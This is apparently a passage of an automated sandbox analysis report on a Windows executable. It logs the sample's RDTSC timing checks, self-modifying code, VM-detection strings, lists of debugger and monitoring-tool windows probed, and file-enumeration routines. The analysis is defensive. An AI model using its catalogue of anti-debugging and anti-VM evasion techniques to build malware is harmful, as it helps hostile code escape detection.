                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2B884 second address: C2B88A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30A2B second address: C30A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C36E03 second address: C36E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB9B11D9857h 0x0000000d jp 00007FB9B11D9846h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C36E30 second address: C36E4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB9B1005724h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F6A0 second address: C3F6AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9B11D9846h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F6AA second address: C3F6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47E54 second address: C47E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007FB9B11D984Ch 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FB9B11D9851h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47E7D second address: C47E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47E88 second address: C47E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48003 second address: C4800B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4800B second address: C48011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48011 second address: C48015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4859F second address: C485E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FB9B11D986Eh 0x0000000b jmp 00007FB9B11D984Dh 0x00000010 jg 00007FB9B11D984Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4870F second address: C48742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jne 00007FB9B100571Eh 0x0000000b pushad 0x0000000c jo 00007FB9B1005716h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007FB9B1005725h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488A4 second address: C488BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB9B11D9850h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488BD second address: C488C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488C1 second address: C488DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9B11D9853h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488DE second address: C488F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B1005725h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488F7 second address: C48915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9855h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C27E second address: C4C293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB9B1005716h 0x0000000a popad 0x0000000b jc 00007FB9B100571Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53734 second address: C53739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53739 second address: C53772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB9B1005716h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jg 00007FB9B1005733h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53772 second address: C53776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53776 second address: C5377E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5377E second address: C5378F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007FB9B11D9846h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A4D9 second address: C5A515 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB9B100572Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB9B1005724h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A515 second address: C5A519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A519 second address: C5A52D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005720h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A52D second address: C5A533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A533 second address: C5A54B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB9B100572Ah 0x00000008 jmp 00007FB9B100571Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D3A7 second address: C5D3BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9853h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D3BE second address: C5D3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D3C4 second address: C5D3E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB9B11D9846h 0x0000000a jmp 00007FB9B11D9853h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CA06 second address: C6CA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FB9B1005724h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007FB9B1005716h 0x00000013 pop edx 0x00000014 popad 0x00000015 jnl 00007FB9B1005738h 0x0000001b pushad 0x0000001c jno 00007FB9B1005716h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CA39 second address: C6CA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CA3F second address: C6CA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FB9B1005716h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D917 second address: C7D91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C904 second address: C7C91D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB9B1005716h 0x00000008 jmp 00007FB9B100571Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C91D second address: C7C92A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FB9B11D9846h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD87 second address: C7CD8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD8D second address: C7CD9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Ah 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D082 second address: C7D086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D1CA second address: C7D1D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9B11D9846h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D31B second address: C7D32B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007FB9B1005716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D32B second address: C7D337 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D5D9 second address: C7D5E7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D5E7 second address: C7D5F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D5F4 second address: C7D5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C80449 second address: C8044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8077E second address: C80797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jns 00007FB9B1005716h 0x00000012 jno 00007FB9B1005716h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C80797 second address: C807E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ebx 0x0000000b sub dword ptr [ebp+12457670h], eax 0x00000011 pop edx 0x00000012 push dword ptr [ebp+12458AE8h] 0x00000018 cld 0x00000019 pushad 0x0000001a mov esi, dword ptr [ebp+122D288Eh] 0x00000020 sub dword ptr [ebp+122D293Ch], esi 0x00000026 popad 0x00000027 call 00007FB9B11D9849h 0x0000002c pushad 0x0000002d ja 00007FB9B11D984Ch 0x00000033 jno 00007FB9B11D9846h 0x00000039 push eax 0x0000003a push edx 0x0000003b push edx 0x0000003c pop edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C807E3 second address: C807E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8344C second address: C83452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83452 second address: C83472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9B1005716h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB9B1005723h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83472 second address: C83481 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C854A4 second address: C854A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C854A8 second address: C854AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F026A second address: 52F0270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0270 second address: 52F0274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0274 second address: 52F02DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B100571Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FB9B1005726h 0x00000011 push eax 0x00000012 jmp 00007FB9B100571Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FB9B1005726h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB9B1005727h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03DC second address: 52F03E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03E0 second address: 52F03E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03E6 second address: 52F03EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03EC second address: 52F0442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005728h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FB9B100571Ch 0x00000015 and esi, 04292DD8h 0x0000001b jmp 00007FB9B100571Bh 0x00000020 popfd 0x00000021 mov ebx, ecx 0x00000023 popad 0x00000024 popad 0x00000025 pop ebp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FB9B100571Dh 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0442 second address: 52F0446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9F1B6A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B90049 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B8EAA4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B8E6CE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BB8814 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C1AA42 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007A38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0079DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0079E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007A4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0079ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0079BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0079DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0079F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007A3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00791160 GetSystemInfo,ExitProcess,0_2_00791160
                Source: file.exe, file.exe, 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware1a
                Source: file.exe, 00000000.00000002.1789228980.0000000001523000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1789228980.00000000014F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13338
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13341
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13359
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13353
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13393
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007945C0 VirtualProtect ?,00000004,00000100,000000000_2_007945C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007A9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A9750 mov eax, dword ptr fs:[00000030h]0_2_007A9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007A7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match, file source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_007A9600
                Source: file.exeBinary or memory string: U) VProgram Manager
                Source: file.exe, 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_007A7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_007A6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007A7850
